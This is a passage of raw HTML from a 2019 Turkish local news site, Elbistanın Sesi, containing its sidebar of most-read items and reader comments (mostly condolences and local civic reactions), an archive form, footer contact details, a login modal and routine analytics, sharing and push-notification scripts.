Müftüsü Hacı Mustafa Kılınç, cenaze sahibinin verdiği...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/yere-cekirdek-kabugu-sigara-izmariti-atana-ve-tukurene-ceza-geliyor-h63897.html" title="Yere çekirdek kabuğu, sigara izmariti..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/yere_cekirdek_kabugu_sigara_izmariti_atana_ve_tukurene_ceza_geliyor_h63897_435a3.jpg" alt="Yere çekirdek kabuğu, sigara izmariti..."></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/yere-cekirdek-kabugu-sigara-izmariti-atana-ve-tukurene-ceza-geliyor-h63897.html" title="" ><span class="en-hit">4.</span> <strong>Yere çekirdek kabuğu, sigara izmariti...</strong> <span class="en-spot en-hidden">Elbistan Belediyesi Zabıta Müdürlüğü ekipleri, yerlere sigara izmariti...</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/ismet-sunduz-cevik-81-yasinda-h63818.html" title="İsmet Sündüz Çevik 81 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/ismet_sunduz_cevik_81_yasinda_h63818_089d4.jpg" alt="İsmet Sündüz Çevik 81 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ismet-sunduz-cevik-81-yasinda-h63818.html" title="" ><span class="en-hit">5.</span> <strong>İsmet Sündüz Çevik 81 yaşında</strong> <span class="en-spot en-hidden">İsmet Sündüz Çevik 81 yaşında</span></a></div></li> </ul> </div> </div> </div> </div> </div> <!-- SON YORUMLAR --> <div class="sayfalar"> <div class="header"> <h5>Son Yorumlar</h5> </div> <div class="content"> <ul class="unstyled"> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/ozel-belgede-sahtecilik-ve-dolandiricilik-iddiasi-1-tutuklama-h63965.html#comment_265568" title="" >Emniyet güçlerimizi tebrik ediyorum. Insanlarımızı...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistanli-genel-cerrah-akin-tekin-dunya-tip-tarihine-gecti-h63950.html#comment_265567" title="" >Bunun entellikle ve ya herhangi bir felsefe...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/durdu-govcecik-86-yasinda-h63960.html#comment_265566" title="" >Allah rahmet eylesin mekani cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/durdu-govcecik-86-yasinda-h63960.html#comment_265565" title="" >Canım dedem seni çok seviyorum seni vefat...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/cuma-aydin-h63955.html#comment_265564" title="" >Allah rahmet eylesin mekanı cennet olsun,...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/polis-cakari-kullanan-surucuye-2-bin-4-lira-ceza-h63966.html#comment_265563" title="" >Az yazılmış 10 bin olmasi lazim halkin...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/durdu-govcecik-86-yasinda-h63960.html#comment_265562" title="" >merhuma Allah tan rahmet ailesi ve yakinlarina...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-elbistanli-ismi-genel-mudur-olarak-atadi-h63968.html#comment_265559" title="" >Hayırlı olsun, Başarılar diliyorum İnşAllah</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hatice-elma-h63954.html#comment_265558" title="" >Allah rahmet eylesin, mekanı cennet olsun....</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/cuma-aydin-h63955.html#comment_265557" title="" >Allah rahmet eylesin, mekanı cennet, tüm...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/ulu-camii-karsisindaki-metruk-binalar-yikiliyor-h63953.html#comment_265555" title="" >Ak partili değilim ama şuan ki hizmetler...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/emine-adbay-84-yasinda-h63918.html#comment_265553" title="" >Merhumeye Allah&#39;tan rahmet, ailesine...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/fadime-sakalar-77-yasinda-h63917.html#comment_265552" title="" >Merhumeye Allah&#39;tan rahmet, ailesine...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/0800-1800-arasi-cop-birakmak-yasak-h63961.html#comment_265551" title="" >ankara çankayada bu uygulama yıllardır...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hamza-durak-h63939.html#comment_265550" title="" >Degerli abime Allahtan rahmet yakınlarına...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistanin-kuzey-aksinda-asfalt-calismalari-basladi-h63969.html#comment_265549" title="" >Belan tuneli ne oldu. Kaç seçim daha bahsedilir...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-elbistanli-ismi-genel-mudur-olarak-atadi-h63968.html#comment_265548" title="" >Allah&#39;ım hayırlı eylesin . başarılar..</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistanin-kuzey-aksinda-asfalt-calismalari-basladi-h63969.html#comment_265547" title="" >yön levhasıda diksinler. millet sultan...</a></li> <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-elbistanli-ismi-genel-mudur-olarak-atadi-h63968.html#comment_265546" title="" >Allah hayırlı uğurlu eylesin ali bey...</a></li> </ul> </div> </div> <!-- ARSIV --> <div class="arsiv"> <div class="header"> <h5>Arşiv</h5> </div> <div class="content"> <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" > <select name="gun" class="day span1"> <option value="01" >01</option> <option value="02" >02</option> <option value="03" >03</option> <option value="04" >04</option> <option value="05" >05</option> <option value="06" >06</option> <option value="07" >07</option> <option value="08" >08</option> <option value="09" >09</option> <option value="10" >10</option> <option value="11" >11</option> <option value="12" >12</option> <option value="13" >13</option> <option value="14" >14</option> <option value="15" >15</option> <option value="16" >16</option> <option value="17" >17</option> <option value="18" >18</option> <option value="19" >19</option> <option value="20" >20</option> <option value="21" >21</option> <option value="22" >22</option> <option value="23" >23</option> <option value="24" selected>24</option> <option value="25" >25</option> <option value="26" >26</option> <option value="27" >27</option> <option value="28" >28</option> <option value="29" >29</option> <option value="30" >30</option> <option value="31" >31</option> </select> <select name="ay" class="month span1"> <option value="01" >Ocak</option> <option value="02" >Şubat</option> <option value="03" >Mart</option> <option value="04" >Nisan</option> <option value="05" >Mayıs</option> <option value="06" >Haziran</option> <option value="07" >Temmuz</option> <option value="08" selected>Ağustos</option> <option value="09" >Eylül</option> <option value="10" >Ekim</option> <option value="11" >Kasım</option> <option value="12" >Aralık</option> </select> <select name="yil" class="year span1"> <option value="2019" selected>2019</option> <option value="2018" >2018</option> <option value="2017" >2017</option> <option value="2016" >2016</option> <option value="2015" >2015</option> </select> <button type="submit" class="btn btn-default pull-right">Ara</button> </form> </div> </div> </div> </div> <!-- Sol Dikey Reklam --> <div class="reklam dikey sol" style="width:px;height:px;"> </div> <!-- Sağ Dikey Reklam --> <div class="reklam dikey sag ortala" style="width:160px;height:415px;"> <p style="width:160px;"><a href="http://www.elbistaninsesi.com/banner.php?id=129" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/YMAMI_AZAM_CAMY_YARDIM.jpg&w=160&h=415&q=90" width="160" height="415" style="width:160px;height: 415px;border:0" alt="banner129" /></a></p> <p style="width:160px;"><a href="http://www.elbistaninsesi.com/banner.php?id=116" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/2.jpg&w=160&h=248&q=90" width="160" height="248" style="width:160px;height: 248px;border:0" alt="banner116" /></a></p> </div> </div> <!-- FOOTER --> <div id="siteFooter" class="footer"> <div class="row-fluid"> <div class="container center"> <div class="span4"> <div>Copyright © 2019 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div> <div class="footer-social"> <a href="http://facebook.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a> <a href="http://twitter.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a> <a href="https://www.instagram.com/elbistaninsesi_/" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/ins-ico.png" width="32" height="32" /> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/google_circle-32.png" alt="GOOGLE PLUS"></a> <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a> </div> </div> <div class="span4 text-center"> <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Cumhurbaşkanı Erdoğan, Elbistanlı ismi genel müdür olarak atadı" /></a></div> </div> <div class="span4"> <p><center> 0 (344) 415 04 15 <br> gazete@elbistaninsesi.com <br>Kızılcaoba Mah. Kışla Cad. 19/1</center> </p> <p class="site-info glyphicons earphone">0 (344) 415 04 15</p> </div> </div> </div> <div id="footer-alt" class="row-fluid"> <div class="container center"> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="#" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div> </div> </div> </div> <div class="row-fluid"> <div class="container center"> <div class="span12 text-center"> <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p> <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim" target="_blank">TE Bilişim<br> </div> </div> </div> <div id="top" class="btn btn-inverse">Yukarı Çık</div> </div> <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Üye Girişi</h3> </div> <div class="modal-body"> <form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fguncel%2Fcumhurbaskani-erdogan-elbistanli-ismi-genel-mudur-olarak-atadi-h63968.html" method="post"> <div class="control-group"> <label class="control-label" for="inputName">Kullanıcı Adı</label> <div class="controls"> <input id="inputName" value="" name="kullanici" type="text" placeholder="Kullanıcı Adı" required> </div> </div> <div class="control-group"> <label class="control-label" for="inputPassword">Şifre</label> <div class="controls"> <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required> </div> </div> <div class="control-group"> <div class="controls"> <button type="submit" class="btn btn-info">Giriş Yap</button> </div> </div> </form> </div> <div class="modal-footer"> <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a> <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a> <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button> </div> </div> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/getshares.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.elevateZoom-3.0.8.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system-min.js"></script> <script type="text/javascript">	new UISearch( document.getElementById( 'sb-search' ) );	$(function(){	});	$("#comment_list .text").pKisalt();	var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML;	var gsSpace = ' ';	var gsUrl = location.href;	new GetShare({ root: $(".gs-facebook"), network: "facebook", share: { }	});	new GetShare({ root: $(".gs-twitter"), network: "twitter", share: { message:gsTitle+gsSpace+gsUrl }	});	new GetShare({ root: $(".gs-google"), network: "googleplus", share: { }	});	new GetShare({ root: $(".gs-linkedin"), network: "linkedin", share: { }	});	jQuery('#anasayfayazar').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[4,4,4,4],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"off",	delay:4000,	speed:750	});	jQuery('#gununmansetleri').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[6,6,6,6],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"on",	delay:4000,	speed:750	});	$('#haber > .page-header').waypoint(function(direction) { $('#article-finished').toggleClass('hiding', direction === "up");	}, { offset: function() { return $.waypoints('viewportHeight') - $(this).height() - 750; }	});	function addLink() { var kisa_site_adi = "Elbistanın Sesi"; var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com"; var body_element = document.getElementsByTagName('body')[0]; var selection; selection = window.getSelection(); var pagelink = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi; var copytext = selection + pagelink; var newdiv = document.createElement('div'); newdiv.style.position='absolute'; newdiv.style.left='-99999px'; body_element.appendChild(newdiv); newdiv.innerHTML = copytext; selection.selectAllChildren(newdiv); window.setTimeout(function() { body_element.removeChild(newdiv); },0);	}	document.oncopy = addLink;	tebilisim('63968', 'haber', ''); </script> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', analitik_ga, 'auto'); ga('send', 'pageview'); </script> <!-- End Google Analytics --> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async='async'></script> <script> var OneSignal = window.OneSignal || [];	OneSignal.push(["init", {	appId: "51fe1034-635b-4e70-859b-1fc8dff5f28d",	autoRegister: true,	subdomainName: 'elbistaninsesi',	setDefaultNotificationUrl: 'http://www.elbistaninsesi.com/',	notifyButton: { enable: false	},	/*	welcomeNotification: { "title": "Hoş geldiniz", "message": "Bildirimlerimize üye olduğunuz teşekkür ederiz.",	},	*/ promptOptions: { actionMessage: "Sondakika haberlerimizi anında öğrenebilmek için bildirimleri kabul edin!", acceptButtonText: "ABONE OL", cancelButtonText: "İSTEMİYORUM", autoAcceptTitle: '"İzin ver" butonuna tıklayın', exampleNotificationCaption: '(istediğin zaman aboneliğini iptal edebilirsin)', } }]); </script> </body> </html> 